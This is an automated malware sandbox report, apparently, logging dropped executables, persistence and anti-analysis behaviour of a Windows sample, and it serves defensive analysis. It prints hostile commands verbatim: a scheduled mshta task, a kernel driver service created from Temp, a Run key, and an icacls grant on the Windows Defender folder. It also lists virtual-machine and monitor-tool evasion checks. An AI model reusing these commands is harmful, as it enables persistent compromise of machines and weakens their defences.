Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\22.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File created: C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File created: C:\Windows\Tasks\rapes.job
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f4d01cf3f8.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E71C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00E71C41
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: B13378 second address: B1337C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: B1337C second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1EC5h], ecx 0x00000010 push dword ptr [ebp+122D0091h] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+122D21D6h], esi 0x0000001d mov eax, dword ptr [ebp+122D2B53h] 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1EFEh] 0x0000002a pushad 0x0000002b mov dword ptr [ebp+122D260Eh], edi 0x00000031 xor eax, eax 0x00000033 stc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D260Eh], eax 0x0000003e mov dword ptr [ebp+122D2DBBh], eax 0x00000044 cmc 0x00000045 mov esi, 0000003Ch 0x0000004a mov dword ptr [ebp+122D260Eh], esi 0x00000050 mov dword ptr [ebp+122D260Eh], esi 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007F58F4C28986h 0x0000005f lodsw 0x00000061 cmc 0x00000062 mov dword ptr [ebp+122D28BBh], ecx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c jmp 00007F58F4C28987h 0x00000071 jmp 00007F58F4C28988h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a clc 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f je 00007F58F4C28976h 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C91B9F second address: C91BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F58F53CD386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8193F second address: C81962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Eh 0x00000007 jo 00007F58F4C2897Ch 0x0000000d jnc 00007F58F4C28976h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B27 second address: C90B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F58F53CD386h 0x0000000a jc 00007F58F53CD386h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B39 second address: C90B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F58F4C28986h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B59 second address: C90B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E45 second address: C90E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C2897Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E55 second address: C90E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F58F53CD386h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C913E3 second address: C91401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28985h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C943B3 second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 28085C14h 0x0000000e mov dword ptr [ebp+1244EC87h], ecx 0x00000014 mov edx, 1DD02C11h 0x00000019 push dword ptr [ebp+122D0091h] 0x0000001f stc 0x00000020 call dword ptr [ebp+122D1EFEh] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D260Eh], edi 0x0000002d xor eax, eax 0x0000002f stc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D260Eh], eax 0x0000003a mov dword ptr [ebp+122D2DBBh], eax 0x00000040 cmc 0x00000041 mov esi, 0000003Ch 0x00000046 mov dword ptr [ebp+122D260Eh], esi 0x0000004c mov dword ptr [ebp+122D260Eh], esi 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jmp 00007F58F53CD396h 0x0000005b lodsw 0x0000005d cmc 0x0000005e mov dword ptr [ebp+122D28BBh], ecx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007F58F53CD397h 0x0000006d jmp 00007F58F53CD398h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 clc 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b je 00007F58F53CD386h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94499 second address: C944EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F58F4C2897Ah 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F58F4C28988h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007F58F4C28983h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944EF second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944F9 second address: C944FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944FF second address: C94539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c xor edi, dword ptr [ebp+122D2B63h] 0x00000012 lea ebx, dword ptr [ebp+12455317h] 0x00000018 sub cx, E73Ah 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F58F53CD393h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C9465E second address: C946D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F58F4C28976h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d sub cl, FFFFFFACh 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F58F4C28978h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c add esi, 20CAB300h 0x00000032 push 00000000h 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F58F4C28978h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov dx, si 0x00000053 cmc 0x00000054 push 8901C812h 0x00000059 js 00007F58F4C28984h 0x0000005f push eax 0x00000060 push edx 0x00000061 push esi 0x00000062 pop esi 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C946D0 second address: C9470B instructions: 0x00000000 rdtsc 0x00000002 je 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 4901C812h 0x00000011 mov edi, 04D91295h 0x00000016 lea ebx, dword ptr [ebp+12455320h] 0x0000001c adc di, EF02h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007F58F53CD393h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C9470B second address: C94710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94710 second address: C94721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007F58F53CD38Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94721 second address: C94729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CA5264 second address: CA528A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD38Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F53CD38Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F18 second address: C84F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28989h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F37 second address: C84F41 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F58F53CD386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2CB1 second address: CB2CB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2CB7 second address: CB2CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2F4B second address: CB2F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB2F54 second address: CB2F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB326C second address: CB3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F58F4C28976h 0x00000011 jl 00007F58F4C28976h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3536 second address: CB354C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F58F53CD38Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB354C second address: CB356B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F58F4C28984h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB356B second address: CB3571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3B30 second address: CB3B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3B36 second address: CB3B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3E1F second address: CB3E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jo 00007F58F4C28976h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3E2E second address: CB3E34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB3E34 second address: CB3E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7FE33 second address: C7FE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB4677 second address: CB46A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F58F4C28986h 0x0000000d jmp 00007F58F4C28982h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB46A7 second address: CB46BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F58F53CD386h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB46BB second address: CB46BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86A78 second address: C86A9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F58F53CD386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F58F53CD399h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86A9D second address: C86AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86AA3 second address: C86AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86AA7 second address: C86AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C86AAB second address: C86AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB96ED second address: CB970F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F58F4C28984h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB9D45 second address: CB9D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
